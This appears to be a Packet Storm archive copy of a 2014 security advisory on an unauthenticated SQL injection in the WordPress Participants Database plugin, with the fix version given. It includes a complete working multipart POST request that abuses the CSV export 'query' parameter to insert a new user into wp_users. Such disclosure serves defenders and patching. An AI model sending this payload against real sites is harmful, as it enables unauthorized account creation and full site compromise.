what you don't know can hurt you

WordPress Participants Database 1.5.4.8 SQL Injection

WordPress Participants Database 1.5.4.8 SQL Injection
Posted Jun 2, 2014
Authored by Yarubo Research Team

WordPress Participants Database plugin versions 1.5.4.8 and below suffer from an arbitrary remote SQL injection vulnerability.

tags | exploit, remote, arbitrary, sql injection
MD5 | d6e1afcc6cd5694fc6b843b581eab617

WordPress Participants Database 1.5.4.8 SQL Injection

Change Mirror Download
Yarubo #1: Arbitrary SQL Execution in Participants Database for Wordpress
=========================================================================

Program: Participants Database <= 1.5.4.8
Severity: Unauthenticated attacker can fully compromise the Wordpress
installation
Permalink: http://www.yarubo.com/advisories/1

— Info —

Participants Database is a popular Wordpress plugin that offers the
functionality needed to build and maintain a database of people. As of
today the plugin has been downloaded 92,089 times.

— Vulnerability details —

1. Due to insufficient privilege checks it is possible for anonymous
(unauthenticated) users to trigger some administrative actions If any of
the shortcodes is used (e.g. signup page).

2. The action "export CSV" takes a parameter called "query" that can
contain an arbitrary SQL query. This means that an unauthenticated user can
execute arbitrary SQL statements (e.g. create an admin user, read or write
files, or execute code depending on the MySQL user privileges).


— Exploit —

Add a user to wordpress as follows (if you want an admin user, also add
admin privileges to wp_usermeta):


POST /wordpress/pdb-signup/ HTTP/1.1
Host: www.example.com
Content-Length: 789
(…)
Content-Type: multipart/form-data;
boundary=----WebKitFormBoundaryuoACADe1C2IFWMxN

------WebKitFormBoundaryuoACADe1C2IFWMxN
Content-Disposition: form-data; name="action"

output CSV
------WebKitFormBoundaryuoACADe1C2IFWMxN
Content-Disposition: form-data; name="CSV_type"

participant list
------WebKitFormBoundaryuoACADe1C2IFWMxN
Content-Disposition: form-data; name="subsource"

participants-database
------WebKitFormBoundaryuoACADe1C2IFWMxN
Content-Disposition: form-data; name="query"

INSERT INTO wp_users
(ID,user_login,user_pass,user_nicename,user_email,user_registered,user_status,display_name)
VALUES
(31337,0x74657374,0x245024425a7a59615354486f41364b693355363576772f5461473861412f475a4b31,0x59617275626f,0x7465737440746573742e636f6d,0x323031342d31312d31312030303a30303a3030,0,0x59617275626f);

------WebKitFormBoundaryuoACADe1C2IFWMxN



— Solution —

This issue has been fixed in version 1.5.4.9. Download the newest version
from:

https://wordpress.org/plugins/participants-database/


— Credit —


Yarubo Research Team
research [at] yarubo.com

Network Security Scan:
http://www.yarubo.com/

Free Heartbleed Scan:
http://www.yarubo.com/heartbleed
Login or Register to add favorites

File Archive:

September 2021

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    14 Files
  • 2
    Sep 2nd
    19 Files
  • 3
    Sep 3rd
    9 Files
  • 4
    Sep 4th
    1 Files
  • 5
    Sep 5th
    2 Files
  • 6
    Sep 6th
    3 Files
  • 7
    Sep 7th
    12 Files
  • 8
    Sep 8th
    22 Files
  • 9
    Sep 9th
    17 Files
  • 10
    Sep 10th
    19 Files
  • 11
    Sep 11th
    3 Files
  • 12
    Sep 12th
    2 Files
  • 13
    Sep 13th
    15 Files
  • 14
    Sep 14th
    16 Files
  • 15
    Sep 15th
    15 Files
  • 16
    Sep 16th
    7 Files
  • 17
    Sep 17th
    13 Files
  • 18
    Sep 18th
    2 Files
  • 19
    Sep 19th
    2 Files
  • 20
    Sep 20th
    14 Files
  • 21
    Sep 21st
    20 Files
  • 22
    Sep 22nd
    28 Files
  • 23
    Sep 23rd
    13 Files
  • 24
    Sep 24th
    10 Files
  • 25
    Sep 25th
    1 Files
  • 26
    Sep 26th
    1 Files
  • 27
    Sep 27th
    20 Files
  • 28
    Sep 28th
    19 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close